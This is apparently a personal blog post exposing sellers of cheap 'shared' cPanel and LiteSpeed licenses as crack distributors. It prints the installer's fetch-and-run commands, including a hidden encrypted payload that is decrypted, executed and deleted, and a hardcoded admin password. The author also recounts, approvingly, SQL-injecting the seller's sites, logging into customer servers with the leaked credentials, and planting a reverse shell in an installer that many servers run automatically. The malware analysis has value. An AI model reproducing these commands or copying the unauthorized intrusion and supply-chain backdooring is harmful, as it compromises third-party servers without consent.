Shared License or Crack? Access to 1000+ servers

Namaste to all readers,

Actually, I wanted to buy Cpanel and LiteSpeed license for my hosting server so I searched on google and found some cheap providers saying shared license.
Since Cpanel only accepts international credit cards and I didn’t have one so I searched for Indian providers on google.

Usually, these software plans start around $15–20/month but some websites like SKHOST, BALLIAHOST, and many others showed plans starting around 3–5$ for the same.

So all said Shared license no crack full secure and I was really a newbie for purchasing license so I fall in their trap and paid for both .

I paid around 15$ for both and checked their client area for the license key.
It showed to run some sort of commands for activating the product

rm -rf installer
rm -rf setup
wget license.skphost.net/litespeed/installer
chmod +x installer
./installer
SKPHost-LicenseLSWS

Really?

So they want me to install some 3rd party scripts for the product.

So basically I am paying for some unknown scripts whose responsibilities are neither taken by Cpanel or the sellers ;_;
I thought why not check the scripts they want me to run so I fired up the gdb to check those file.

There was a system function called and after setting a breakpoint we can check the registers for values.

rm -rf /root/setup ; cd /root ; wget http://litespeed.resellercenter.ir/litespeedv1/setup > /dev/null 2>&1 ; chmod +x setup
php /root/setup

So this script is fetching some PHP file from another server.

The entire script is protected by Source Guardian.
And according to the Source guardian website, “Our PHP encoder protects your PHP code by compiling the PHP source code into a binary bytecode format, which is then supplemented with an encryption layer.”
So we can’t get the proper source code from the memory but I found an awesome write-up for this on the medium by Chris Lyne.

https://medium.com/tenable-techblog/dumping-php-opcodes-protected-by-sourceguardian-a0acd8058038

I used Chris Lyne’s trick for Dumping PHP Opcodes from file.

KaBoooom!! XD

This script was installing Proxychains, LiteSpeed, and fetching some more files.
One line other than their files that caught my eyes were

‘cd /usr/src; rm -rf lsws_whm_autoinstaller.sh; wget https://www.litespeedtech.com/packages/cpanel/lsws_whm_autoinstaller.sh; chmod a+x lsws_whm_autoinstaller.sh; ./lsws_whm_autoinstaller.sh TRIAL 1 0 admin WFi9fqhxxxxxxxxxxxx root@localhost 1 1’

So servers who ran their scripts for installing lsws are getting installed with same credentials for LiteSpeed web console.

Again lets analyze the external files we got here.

wget http://litespeed.resellercenter.ir/litespeedv1/RcLicenseLSWS

root@ip:/tmp/litespeed# file RcLicenseLSWS
RcLicenseLSWS: ELF 64-bit LSB executable, x86–64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86–64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1d86ee60cbf26237bab45e92bb19e5dac19bd9a3, not stripped
root@ip:/tmp/litespeed#

Again a system function for fetching other file ;-;

wget -O /usr/bin/.RcLicense_lsws https://litespeed.resellercenter.ir/litespeedv2/seRcLicense_lsws > /dev/null 2>&1
openssl aes-256-cbc -in /usr/bin/.RcLicense_lsws -out /usr/local/.vmfilsws -d -pass pass:xxxxxxxxxxxx
php /usr/local/.vmfilsws
comp0 -i /usr/local/.vmfilsws > /dev/null 2>&1
umount /usr/local/.vmfilsws > /dev/null 2>&1
rm -rf /usr/local/.vmfilsws > /dev/null 2>&1
rm -rf /usr/bin/.RcLicense_lsws > /dev/null 2>&1

This seRcLicense is encoded by OpenSSL but wait what’s the point when the password is in the binary itself 😆

So after decoding it was again a PHP file encoded with Source Guardian but we can dump the opcodes as earlier.

After checking this it was not difficult to understand how they blocking all traffic for LiteSpeed’s servers and redirecting them to their own and replacing the license with their socks one.

Anyways enough of these binaries and PHP files.

Let’s come directly to the server access the jackpot part 😈

I thought like I purchased this license from Indian sellers who were reselling these from Iranian websites ,so I ran some tools for subdomains and waybackurls and got some interesting links.

After checking few links I found some of them were vulnerable to SQLI .

From one table 900+ Active Ips

I checked the IPs on verify.cpanel .net and none of them had a working plan active.

Either expired or running on 15-day trial.

Remember the password for Litespeed in the script used for configuring?
I tried to randomly hit IP from the database and tried to login

But this is not what we are interested in so I tried using the credentials found from the links.
And voila it worked and after getting access to their site I was able to see all of their data and files.

On checking their database , there were 9K+ IPs, and more than thousand active.

Basically, they were running an entire whmcs for selling these scripts which takes an IP from the user while purchasing(making them believe that their IP is getting authorized with license).
For reselling they made a portal and wchms plugins for providing scripts to users.
I simply placed a reverse shell in one of their installer scripts and boom

Since I was able to modify or add anything I want and the servers fetching those files will run it blindly.

Well, this was just from a single supplier but if you google to buy cheap Cpanel, Whcms, LiteSpeed, etc software or shared license you will find thousands of websites selling these types of cracks for cheap.
In name of selling shared licenses, they are forcing you to install their own scripts.
Anyways I wasted around 15$ for nothing and later had to buy licenses again from the main web.

Conclusion- Never trust cheap things available on the internet for alternatives and to stop the use of cracked/nulled software.